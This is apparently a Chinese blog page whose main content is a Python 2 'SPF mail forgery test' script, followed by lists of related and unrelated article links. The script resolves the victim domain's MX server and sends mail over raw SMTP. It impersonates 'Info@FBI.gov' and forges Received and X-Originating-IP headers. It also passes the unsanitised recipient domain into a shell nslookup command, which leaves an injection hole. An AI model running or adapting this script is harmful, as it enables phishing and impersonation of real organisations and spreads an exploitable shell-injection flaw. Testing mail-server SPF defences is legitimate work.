测试脚本:

# -*- coding: utf-8 -*-

import socket,select,base64,os,re,time,datetime

class mail:

    def __init__(self):

        self.errmsg = ''

    def send(self, buf):

        try:

            byteswritten = 0

            while byteswritten < len(buf):

                byteswritten += self.__sockfd.send(buf[byteswritten:])

        except:

            pass

    def recvline(self, strline):

        detect_fds = [self.__sockfd,]

        rrdy, wrdy, erdy = select.select(detect_fds, [], [], 20)

        if len(rrdy) == 0:

            return False

        else:

            while True:

                try:

                    strtmp = self.__sockfd.recv(1)

                    strline[0] += strtmp[0]

                    if(strtmp[0] == '\n'):

                        print 'server : '+strline[0]

                        break

                except:

                    return False

            return True

    def getresp(self, resp_str):

        while True:

            if(self.recvline(resp_str) == False):

                return False

            else:

                if resp_str[0][3] != '-':

                    break;

        return True

    def mailhelo(self, hostname):

        self.send('helo %s\r\n'%hostname)

        print 'host say: helo %s'%hostname

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailfrom(self, fromstr):

        self.send('mail from: <%s>\r\n'%fromstr)

        print 'host say: mail from: <%s>'%fromstr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailto(self, tostr):

        self.send('rcpt to: <%s>\r\n'%tostr)

        print 'host say: rcpt to: <%s>'%tostr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def maildata(self):

        self.send('data\r\n')

        print 'host say: data'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '354':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailbody(self, bodystr):

        print 'host say: '+'.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n'

        print 'host say: '+'From: "=?GB2312?B?zfU=?=" <'+self.From+'>\r\n'

        print 'host say: '+'Subject:'+self.Subject+'?=\r\n'

        print 'host say: '+'To: <'+self.To+'>\r\n'

        print 'host say: '+bodystr

        self.send('Received: from ICE (unknown [8.8.8.8])\r\n')

        self.send('.by 8.8.8.8 (Coremail) with SMTP id _bJCALesoEAeAFMU.1\r\n')

        self.send('.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n')

        self.send('X-Originating-IP: [8.8.8.8]\r\n')

        self.send('Date: '+time.strftime("%a, %d %b %Y %H:%M:%S +0800",time.localtime())+'\r\n')

        self.send('From: '+self.FromName+ '<'+self.From+'>\r\n')

        self.send('Subject: '+self.Subject+'\r\n')

        self.send('To: <'+self.To+'>\r\n')

        self.send('X-Priority: 1\r\n')

        self.send('X-mailer: iceMail 1.0 [cn]\r\n')

        self.send('Mime-Version: 1.0\r\n')

        self.send('Content-Type: text/plain;\r\n')

        self.send('.charset="GB2312"\r\n')

        self.send('Content-Transfer-Encoding: quoted-printable\r\n\r\n')

        self.send(bodystr)

        self.send('\r\n.\r\n')

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailquit(self):

        self.send('quit\r\n')

        print 'host say: quit'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '221':

            print 'server : Bye'

            print 'mail send ok'

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def txmail(self, hostname, mailfrom, rcptto, bodystr):

        mx_server_list = []

        mail_postfix = re.split('@',rcptto)

        #print mail_postfix

        try:

            outstr = os.popen('nslookup -type=mx -timeout=10 %s'%mail_postfix[1], 'r').read()

        except Exception, e:

            print 'DEBUG: Execute nslookup:',e

            return False

        linestr = re.split('\n', outstr)

        for s in linestr:

            if re.match('.+[ |\t]mail exchanger[ |\t].+', s) != None:

                c = re.split(' |\t', s)

                mx_server_list.append(c[len(c) - 1])

        if len(mx_server_list) == 0:

            self.errmsg = 'Can not find MX server'

            return False

        for mx_element in mx_server_list:

            return_val = True

            mx_server_ip = socket.gethostbyname(mx_element)

            tx_sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)

            try:

                tx_sockfd.connect((mx_server_ip, 25))

                self.__sockfd = tx_sockfd

                resp_str = ['',]

                self.getresp(resp_str)

                if self.mailhelo(hostname) and self.mailfrom(mailfrom) \

                     and self.mailto(rcptto) and self.maildata() and self.mailbody(bodystr) and self.mailquit():

                    pass

                else:

                    return_val = False

            except Exception, e:

                return_val = False

            try:

                tx_sockfd.close()

            except:

                pass

            if return_val == True:

                break

        return return_val

    def sendMail(self):

        self.StmpHost=self.From.split("@")[1]

        self.txmail(self.StmpHost, self.From, self.To, self.Data)

if __name__ == '__main__':

    icemail=mail()

    icemail.Port=25

    icemail.To='YourEmail@163.com'

    icemail.From='Info@FBI.gov'

    icemail.FromName='邮件伪造漏洞测试'

    icemail.Subject='邮件伪造漏洞测试'

    icemail.Data='邮件伪造漏洞测试'

    icemail.sendMail()

SPF邮件伪造漏洞测试脚本的更多相关文章

  1. Swaks绕过SPF验证进行邮件伪造

    0x00 swaks简介 Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具,由John Jetmore编写和维护. 目前Swaks托管在私有svn存储库中.官方项目页面是http ...

  2. 邮件伪造测试-Swaks

    1. 前言 在kali中自带一个邮件伪造工具Swaks,工具项目主页为 http://jetmore.org/john/code/swaks 2.基本用法: swaks --to --from --e ...

  3. SPF难以解决邮件伪造的现状以及方案

    邮件伪造的现状 仿冒域名 私搭邮服仿冒域名: 例如某公司企业的域名是example.com,那么攻击者可以搭建一个邮服,也把自己的域名配置为example.com,然后发邮件给真实的企业员工xxx@e ...

  4. 编写自己的Acunetix WVS漏洞扫描脚本详细教程

    AWVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章 本文以8.0为例,首先呢安装好Acunetix We ...

  5. WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-199 发布时间: 2013-08-22 更新时间: ...

  6. WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-281 发布时间: 2013-08-20 更新时间: 2013-08- ...

  7. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  8. CSRF 漏洞测试

    CSRF简介: CSRF中文名:跨站请求伪造,英文译为:Cross-site request forgery,CSRF攻击就是attacker(攻击者)利用victim(受害者)尚未失效的身份认证信息 ...

  9. JMeter http(s)测试脚本录制器的使用

    JMeter http(s)测试脚本录制器的使用 by:授客 QQ:1033553122 http(s) Test Script Recorder允许Jmeter在你使用普通浏览器浏览web应用时,拦 ...

随机推荐

  1. javascript运动系列第七篇——鼠标跟随运动

    × 目录 [1]眼球转动 [2]苹果菜单[3]方向跟随 前面的话 运动除了直线运动和曲线运动两种运动形式外,还有一种运动形式是鼠标跟随运动,而这种跟随运动需要用到三角函数的相关内容或者需要进行比例运算 ...

  2. 跟我学Angular2(1-初体验)

    0.导言 Angular1作为最流行的前端MV*框架,给前端开发带来了极大的便利性.但是,仍然有许多不好的地方已经很难再改变了.Angular团队根据WEB发展的趋势和Angular1中积累的经验来开 ...

  3. Notes:DOM的事件模拟

    首先使用document对象的createEvent方法创建一个事件对象,然后初始化该事件对象,接着使用支持事件DOM节点的dispatchEvent方法触发事件. DOM2级事件和DOM3级事件有些 ...

  4. 排名前 8 的 PHP 调试工具

    Web 开发并不是一项轻松的任务,有超级多服务端脚本语言提供给开发者,但是当前 PHP 因为具有额外的一些强大的功能而越来越流行.PHP 是最强大的服务端脚本语言之一,同时也是 web 开发者和设计者 ...

  5. PHP中MySQL操作

    本次使用的demo是MySQL的示例数据库employees,点击下载地址,注意在导入的时候,在employees.sql文件中,将source改成你当前的目录. PHP中的demo代码可以在ideo ...

  6. 探秘Tomcat——从一个简陋的Web服务器开始

    前言: 无论是之前所在实习单位小到一个三五个人做的项目,还是如今一个在做的百人以上的产品,一直都能看到tomcat的身影.工作中经常遇到的操作就是启动和关闭tomcat服务,或者修改了摸个java文件 ...

  7. myWaterfall - jQuery瀑布流布局插件

    myWaterfall - jQuery瀑布流布局插件 Demo http://jsfiddle.net/q3011893/p5k2ogy8/embedded/result,html,css,js/ ...

  8. 初次体验百度eCharts遇到的问题和解决方法

    前言 上周在厌烦Highchart下,体验了下百度的eCharts,支持IE6.7.8+外,对数据在线编辑还有工具栏支持,体验时遇到了几个小问题,最近两天在尝试得到了一个解决方法. Tooltip时单 ...

  9. Yahoo军规

    一.尽可能的减少HTTP请求 每一个图片,文字,js文件,css文件都是一个请求. 可以通过合并来请求来减少HTTP请求 比如:图片为一个请求,js文件为一个请求,css为一个请求 二.使用CDN C ...

  10. 到处都是坑的微信支付V3

    业务需要一个在微信上能付款的功能,于是乎想到了最普遍的支付宝,坑爹的是T与A是水火不容啊,默默的还是接微信支付吧,没想到从此掉进了连环坑…… 网上写微信支付接口的还是很多,PHP官方有(鄙视源码作者, ...